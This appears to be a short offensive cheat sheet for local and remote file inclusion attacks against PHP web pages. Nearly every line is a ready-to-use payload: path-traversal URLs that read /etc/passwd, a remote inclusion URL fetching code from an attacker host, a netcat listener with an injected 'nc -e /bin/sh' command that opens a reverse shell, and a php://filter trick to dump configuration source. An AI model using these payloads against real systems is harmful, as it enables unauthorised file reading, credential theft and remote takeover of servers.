To attempt to view the /etc/passwd file
http://host/index.php?page=./../../../../../etc/passwd%00
# To check for LFI
http://target.com/?page=./../../../../../../../../../etc/passwd%00
# To check for RFI
http://target.com/?page=http://hackerip/evil.txt%00
# If you get similar to ?page=index in the browser bar
# In your attacking machine
nc -nlvp 441
# In the browser bar. Replace 10.11.1.139 with your attacking IP.
http://thedomain.com/index.php?page=index%27);${system(%27nc%20-e%20/bin/sh%2010.11.1.139%20441%27)};%23
http://10.11.1.208/?page=php://filter/convert.base64-encode/resource=config
# The resultant code is base64 encoded and needs to be decoded with
echo thestringofcharactersyouweregivenfromabove | base64 --decode